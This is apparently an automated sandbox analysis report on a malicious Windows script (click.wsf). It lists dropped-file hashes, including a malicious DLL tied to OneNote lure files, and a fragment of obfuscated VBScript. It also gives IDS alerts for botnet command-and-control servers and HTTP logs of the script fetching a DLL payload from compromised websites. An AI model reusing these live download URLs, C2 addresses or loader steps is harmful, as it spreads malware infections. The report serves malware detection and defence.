                                                                                        Preview:........0........_k..[..&........................... ...h.1.<...8 .~<...X...........$.....?..[..#..*...C.L...0T.j...................B.........................[.X...........$.....?..[..#..*...C.L...0T.j...............[...B.........................f.`...........$.....?..[..#..*...C.L...0T.i................&..B...............................................$.....?..[..0.K(.J.J.C...............@....... ..B.......................M.i.c.r.o.s.o.f.t...O.f.f.i.c.e...O.u.t.l.o.o.k...C.l.o.u.d.S.e.t.t.i.n.g.s...D.e.f.a.u.l.t.E.n.a.b.l.e.d.S.t.a.t.u.s...].......0.0.............$.....?..[..0.K(.J.J.C...............@........1.B.......................M.i.c.r.o.s.o.f.t...O.f.f.i.c.e...O.u.t.l.o.o.k...R.i.p.C.o.r.d...4.7.2.6.4.2.8...........0.P...........$....HF..[....{(.Z/K.i.a..ZIs.................9.B...................P...........$....HF..[....{(.Z/K.i.a..ZIt.................F.B...................P...........$....HF..[....{(.Z/K.i.a..ZIs.................M.B...................P...........$....HF..[..
Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 9
Entropy (8bit): 2.94770277922009
Encrypted: false
SSDEEP: 3:tWn:tWn
MD5: 07F5A0CFFD9B2616EA44FB90CCC04480
SHA1: 641B12C5FFA1A31BC367390E34D441A9CE1958EE
SHA-256: A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
SHA-512: 09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
Malicious: true
Preview: badum tss
Process: C:\Windows\System32\wscript.exe
File Type: HTML document, ASCII text
Category: dropped
Size (bytes): 381
Entropy (8bit): 5.035593451835013
Encrypted: false
SSDEEP: 6:pn0+Dy9xwq8B0hEr6VHB0SpMAcg/EzBoAuZ2A3b1AYDAJgXPUhA1QCV2AmWZW5Kk:J0+oxb8ShRZSS146Ai2A3JAhSPEAr1mP
MD5: 118A489422BE0C5CA0CECF3BB7903C7E
SHA1: B90AF089FD0E728E61D532BE80062AED39D98978
SHA-256: FF6D14F77E27F7B90CB2F20BCE408189F5F388961F3FCD13FE2DF2CC0A002DC3
SHA-512: 283CD22F52BCCB8DD22A8772E8121302A6975F2DE35540122F1F7B38953F0BB015831999733884686C1A9019034D2CC113F81245F53B84EDD02B8ADB94638D40
Malicious: true
                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>401 Unauthorized</title>.</head><body>.<h1>Unauthorized</h1>.<p>This server could not verify that you.are authorized to access the document.requested. Either you supplied the wrong.credentials (e.g., bad password), or your.browser doesn't understand how to supply.the credentials required.</p>.</body></html>.
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):316928
                                                                                        Entropy (8bit):7.337848702590508
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                        MD5:BFC060937DC90B273ECCB6825145F298
                                                                                        SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                        SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                        SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 79%
Joe Sandbox View:
• Filename: Form - 16 Mar, 2023.one, Detection: malicious
• Filename: MBQ24253060297767042_202303161424.one, Detection: malicious
• Filename: iMedPub_LTD_4.one, Detection: malicious
• Filename: iMedPub_LTD_6.one, Detection: malicious
• Filename: INNOVINC.one, Detection: malicious
• Filename: Insight_Medical_Publishing_2.one, Detection: malicious
• Filename: Insight_Medical_Publishing_1.one, Detection: malicious
• Filename: Insight_Medical_Publishing_3.one, Detection: malicious
• Filename: Insight_Medical_Publishing_4.one, Detection: malicious
• Filename: OMICS_Online_1.one, Detection: malicious
• Filename: Insight_Medical_Publishing.one, Detection: malicious
• Filename: Omics_Journal.one, Detection: malicious
• Filename: OMICS.one, Detection: malicious
• Filename: OPAST_GROUP_1.one, Detection: malicious
• Filename: OPAST_GROUP_LLC.one, Detection: malicious
• Filename: OPAST_GROUP.one, Detection: malicious
• Filename: Opast_International.one, Detection: malicious
• Filename: opastonline.com.one, Detection: malicious
• Filename: Opast_Publishing_Group_1.one, Detection: malicious
• Filename: Opast_Publishing_Group.one, Detection: malicious
                                                                                        Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5139
                                                                                        Entropy (8bit):1.8507519303077096
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Wc/c7JJJPfffffH/jCzDPLAh9ECN/+mMcoqqxGU5nuIIHq+NX9:YNfffffHOriv8xmIID9
                                                                                        MD5:93EDBC6244E8383ED60A93DF93EA281C
                                                                                        SHA1:0BB0BC49B90C8D15BDD689A740966BF9610A6F1F
                                                                                        SHA-256:E32D3D4439E07830ADC99B5660C3195D6DE0CFDC10310711D137842D3B6EDA2D
                                                                                        SHA-512:4DCDFD96F36EB44C639A82202E2BAD9D254EEBF943C3308078BCC7DFD05AAEC2522C28D26730C87E76849BAD2C98CD8E2BDC85B952682C22429D26904C5B0FE9
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\System32\regsvr32.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):316928
                                                                                        Entropy (8bit):7.337848702590508
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                        MD5:BFC060937DC90B273ECCB6825145F298
                                                                                        SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                        SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                        SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                        File type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                        Entropy (8bit):5.21695797640856
                                                                                        TrID:
                                                                                          File name:click.wsf
                                                                                          File size:55114
                                                                                          MD5:016fa961b9af49d75b597c2f61ab344c
                                                                                          SHA1:2fee0634cfa2988ee8f000724efc1c6c18beef23
                                                                                          SHA256:8343af0017ad64499072d1485302948a7ad744a638bd2deab301ae108b6b18fd
                                                                                          SHA512:4b58acb7111c383b0512352d86a3564d0a5167559d402d330ff7167a6e0ae2cf464096bba3a0936a566e3c2a9b0ffc4d448322c86658ed449e14fb46ad8fbdb8
                                                                                          SSDEEP:768:w9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:QTVdaeNtuXndH
                                                                                          TLSH:313362F0AC025C0AE123D977B1BB561359C052FD42683B26FC6D507AE678E3096DD8EB
                                                                                          File Content Preview:<job id="1cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyext
                                                                                          Icon Hash:e8d69ece869a9ec4
Timestamp                 Protocol  SID      Message                                               Source Port  Dest Port  Source IP    Dest IP
03/20/23-09:07:57.133517  TCP       2404314  ET CNC Feodo Tracker Reported CnC Server TCP group 8   49735        80         192.168.2.3  187.63.160.88
03/20/23-09:07:41.132019  TCP       2404312  ET CNC Feodo Tracker Reported CnC Server TCP group 7   49734        443        192.168.2.3  182.162.143.56
03/20/23-09:08:15.086032  TCP       2404302  ET CNC Feodo Tracker Reported CnC Server TCP group 2   49738        8080       192.168.2.3  104.168.155.143
03/20/23-09:07:19.650620  TCP       2404344  ET CNC Feodo Tracker Reported CnC Server TCP group 23  49731        8080       192.168.2.3  91.121.146.47
03/20/23-09:08:10.886539  TCP       2404308  ET CNC Feodo Tracker Reported CnC Server TCP group 5   49737        443        192.168.2.3  164.90.222.65
03/20/23-09:08:05.635641  TCP       2404310  ET CNC Feodo Tracker Reported CnC Server TCP group 6   49736        8080       192.168.2.3  167.172.199.165
03/20/23-09:07:25.133944  TCP       2404330  ET CNC Feodo Tracker Reported CnC Server TCP group 16  49733        7080       192.168.2.3  66.228.32.31
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                          Mar 20, 2023 09:06:41.804079056 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.804203033 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.804330111 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.804413080 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.804776907 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.804878950 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.805115938 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.805233955 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.805362940 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.805445910 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.805696964 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.805790901 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.806183100 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.806284904 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.806482077 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.806663990 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.806747913 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.806852102 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.806955099 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.807145119 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.807157040 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.807199001 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:06:41.807368994 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.807545900 CET49729443192.168.2.3186.202.153.5
                                                                                          Mar 20, 2023 09:06:41.807565928 CET44349729186.202.153.5192.168.2.3
                                                                                          Mar 20, 2023 09:07:16.472873926 CET8049707192.229.221.95192.168.2.3
                                                                                          Mar 20, 2023 09:07:16.473083019 CET4970780192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:07:19.650619984 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:19.678658009 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:19.678903103 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:19.683974981 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:19.711874962 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:19.733274937 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:19.733361959 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:19.733534098 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:19.742285967 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:19.770905972 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:19.813509941 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:20.908953905 CET8049724192.229.221.95192.168.2.3
                                                                                          Mar 20, 2023 09:07:20.909050941 CET4972480192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:07:21.100739002 CET8049716192.229.221.95192.168.2.3
                                                                                          Mar 20, 2023 09:07:21.100895882 CET4971680192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:07:21.139308929 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:21.139368057 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:21.167263985 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:21.176134109 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:21.220303059 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:24.176644087 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:24.176685095 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:24.176748991 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:24.177372932 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:24.177561998 CET497318080192.168.2.391.121.146.47
                                                                                          Mar 20, 2023 09:07:24.205079079 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:24.205108881 CET80804973191.121.146.47192.168.2.3
                                                                                          Mar 20, 2023 09:07:25.133944035 CET497337080192.168.2.366.228.32.31
                                                                                          Mar 20, 2023 09:07:26.134022951 CET497337080192.168.2.366.228.32.31
                                                                                          Mar 20, 2023 09:07:28.134176016 CET497337080192.168.2.366.228.32.31
                                                                                          Mar 20, 2023 09:07:32.134527922 CET497337080192.168.2.366.228.32.31
                                                                                          Mar 20, 2023 09:07:41.132019043 CET49734443192.168.2.3182.162.143.56
                                                                                          Mar 20, 2023 09:07:41.132066965 CET44349734182.162.143.56192.168.2.3
                                                                                          Mar 20, 2023 09:07:41.132396936 CET49734443192.168.2.3182.162.143.56
                                                                                          Mar 20, 2023 09:07:41.133866072 CET49734443192.168.2.3182.162.143.56
                                                                                          Mar 20, 2023 09:07:41.133882999 CET44349734182.162.143.56192.168.2.3
                                                                                          Mar 20, 2023 09:07:51.580180883 CET49734443192.168.2.3182.162.143.56
                                                                                          Mar 20, 2023 09:07:57.133517027 CET4973580192.168.2.3187.63.160.88
                                                                                          Mar 20, 2023 09:07:57.363390923 CET8049735187.63.160.88192.168.2.3
                                                                                          Mar 20, 2023 09:07:57.864705086 CET4973580192.168.2.3187.63.160.88
                                                                                          Mar 20, 2023 09:07:58.094432116 CET8049735187.63.160.88192.168.2.3
                                                                                          Mar 20, 2023 09:07:58.597532988 CET4973580192.168.2.3187.63.160.88
                                                                                          Mar 20, 2023 09:07:58.827022076 CET8049735187.63.160.88192.168.2.3
                                                                                          Mar 20, 2023 09:07:59.329874992 CET4973580192.168.2.3187.63.160.88
                                                                                          Mar 20, 2023 09:07:59.559567928 CET8049735187.63.160.88192.168.2.3
                                                                                          Mar 20, 2023 09:08:00.061964035 CET4973580192.168.2.3187.63.160.88
                                                                                          Mar 20, 2023 09:08:00.291462898 CET8049735187.63.160.88192.168.2.3
                                                                                          Mar 20, 2023 09:08:05.635641098 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:05.803051949 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:05.803226948 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:05.804230928 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:05.971322060 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:05.987366915 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:05.987416983 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:05.987565041 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:05.994112968 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:06.162188053 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:06.163435936 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:06.373666048 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:06.999032974 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:07.039514065 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:09.429970980 CET49720443192.168.2.352.109.13.63
                                                                                          Mar 20, 2023 09:08:09.430159092 CET4972480192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:08:09.430211067 CET49717443192.168.2.352.109.76.141
                                                                                          Mar 20, 2023 09:08:09.448725939 CET8049724192.229.221.95192.168.2.3
                                                                                          Mar 20, 2023 09:08:09.452718019 CET4972480192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:08:09.475805998 CET4434971752.109.76.141192.168.2.3
                                                                                          Mar 20, 2023 09:08:09.475931883 CET49717443192.168.2.352.109.76.141
                                                                                          Mar 20, 2023 09:08:09.553339958 CET4434972052.109.13.63192.168.2.3
                                                                                          Mar 20, 2023 09:08:09.553510904 CET49720443192.168.2.352.109.13.63
                                                                                          Mar 20, 2023 09:08:10.007985115 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:10.008014917 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:10.008292913 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:10.008433104 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:10.008511066 CET497368080192.168.2.3167.172.199.165
                                                                                          Mar 20, 2023 09:08:10.175822973 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:10.175857067 CET808049736167.172.199.165192.168.2.3
                                                                                          Mar 20, 2023 09:08:10.886538982 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:10.886609077 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:10.886698961 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:10.887658119 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:10.887689114 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:11.011811972 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:11.011904001 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:11.014651060 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:11.014684916 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:11.015022039 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:11.016547918 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:11.016575098 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:11.227077007 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:11.227232933 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:11.227376938 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:11.230957031 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:11.230998993 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:11.231015921 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:11.231026888 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:15.086031914 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:15.250612020 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:15.273320913 CET4971680192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:08:15.292093992 CET8049716192.229.221.95192.168.2.3
                                                                                          Mar 20, 2023 09:08:15.294871092 CET4971680192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:08:15.751230001 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:15.915502071 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:16.416353941 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:16.580425978 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:17.080503941 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:17.244565010 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:17.744424105 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:17.908720970 CET8049707192.229.221.95192.168.2.3
                                                                                          Mar 20, 2023 09:08:17.908828974 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:17.909219980 CET4970780192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:08:23.385893106 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:23.592777014 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:24.092982054 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:24.299802065 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:24.800076962 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:25.007067919 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:25.507061958 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:25.713885069 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:26.215094090 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:26.421792984 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:31.887692928 CET497408080192.168.2.3160.16.142.56
                                                                                          Mar 20, 2023 09:08:32.887650013 CET497408080192.168.2.3160.16.142.56
                                                                                          Mar 20, 2023 09:08:34.887854099 CET497408080192.168.2.3160.16.142.56
                                                                                          Mar 20, 2023 09:08:38.888133049 CET497408080192.168.2.3160.16.142.56
                                                                                          Mar 20, 2023 09:08:46.891804934 CET497408080192.168.2.3160.16.142.56
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 09:06:36.428728104 CET | 60008 | 53 | 192.168.2.3 | 1.1.1.1
Mar 20, 2023 09:06:37.266818047 CET | 53 | 60008 | 1.1.1.1 | 192.168.2.3
Mar 20, 2023 09:06:38.496239901 CET | 53710 | 53 | 192.168.2.3 | 1.1.1.1
Mar 20, 2023 09:06:38.754851103 CET | 53 | 53710 | 1.1.1.1 | 192.168.2.3
Mar 20, 2023 09:06:39.017168045 CET | 55103 | 53 | 192.168.2.3 | 1.1.1.1
Mar 20, 2023 09:06:39.699096918 CET | 53 | 55103 | 1.1.1.1 | 192.168.2.3

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 09:06:36.428728104 CET | 192.168.2.3 | 1.1.1.1 | 0x4e7e | Standard query (0) | penshorn.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:06:38.496239901 CET | 192.168.2.3 | 1.1.1.1 | 0x4d17 | Standard query (0) | bbvoyage.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:06:39.017168045 CET | 192.168.2.3 | 1.1.1.1 | 0x8dc3 | Standard query (0) | www.gomespontes.com.br | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 09:06:37.266818047 CET | 1.1.1.1 | 192.168.2.3 | 0x4e7e | No error (0) | penshorn.org | | 203.26.41.131 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:06:38.754851103 CET | 1.1.1.1 | 192.168.2.3 | 0x4d17 | No error (0) | bbvoyage.com | | 31.31.196.172 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:06:39.699096918 CET | 1.1.1.1 | 192.168.2.3 | 0x8dc3 | No error (0) | www.gomespontes.com.br | gomespontes.com.br | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 09:06:39.699096918 CET | 1.1.1.1 | 192.168.2.3 | 0x8dc3 | No error (0) | gomespontes.com.br | | 186.202.153.5 | A (IP address) | IN (0x0001) | false

• penshorn.org
• bbvoyage.com
• www.gomespontes.com.br
• 164.90.222.65

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49727 | 203.26.41.131 | 443 | C:\Windows\System32\wscript.exe

Timestamp | kBytes transferred | Direction | Data
2023-03-20 08:06:38 UTC | 0 | OUT | GET /admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org
2023-03-20 08:06:38 UTC | 0 | IN | HTTP/1.1 404 Not Found
Date: Mon, 20 Mar 2023 08:06:38 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Content-Length: 0
Connection: close
Content-Type: text/html;charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49728 | 31.31.196.172 | 443 | C:\Windows\System32\wscript.exe

Timestamp | kBytes transferred | Direction | Data
2023-03-20 08:06:38 UTC | 0 | OUT | GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: bbvoyage.com
2023-03-20 08:06:39 UTC | 0 | IN | HTTP/1.1 401 Unauthorized
Server: nginx
Date: Mon, 20 Mar 2023 08:06:38 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
WWW-Authenticate: Basic realm="virus_block | access denied, please check email. For access use regru/regru."
                                                                                          2023-03-20 08:06:39 UTC0INData Raw: 31 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f
                                                                                          Data Ascii: 17d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wro


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49729 | 186.202.153.5 | 443 | C:\Windows\System32\wscript.exe

Timestamp | kBytes transferred | Direction | Data
2023-03-20 08:06:40 UTC | 1 | OUT | GET /logs/pd/ HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: www.gomespontes.com.br
2023-03-20 08:06:40 UTC | 1 | IN | HTTP/1.1 200 OK
    Date: Mon, 20 Mar 2023 08:06:40 GMT
    Server: Apache
    X-Powered-By: PHP/7.4.23
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Mon, 20 Mar 2023 08:06:40 GMT
    Content-Disposition: attachment; filename="rwPf3h8uzvlMGyyxN0K0OLQcAOU46ugB.dll"
    Content-Transfer-Encoding: binary
    Set-Cookie: 64181410b8d60=1679299600; expires=Mon, 20-Mar-2023 08:07:40 GMT; Max-Age=60; path=/
    Last-Modified: Mon, 20 Mar 2023 08:06:40 GMT
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: application/x-msdownload
2023-03-20 08:06:40 UTC | 1 | IN | Data Raw: 34 64 36 30 30 0d 0a
    Data Ascii: 4d600
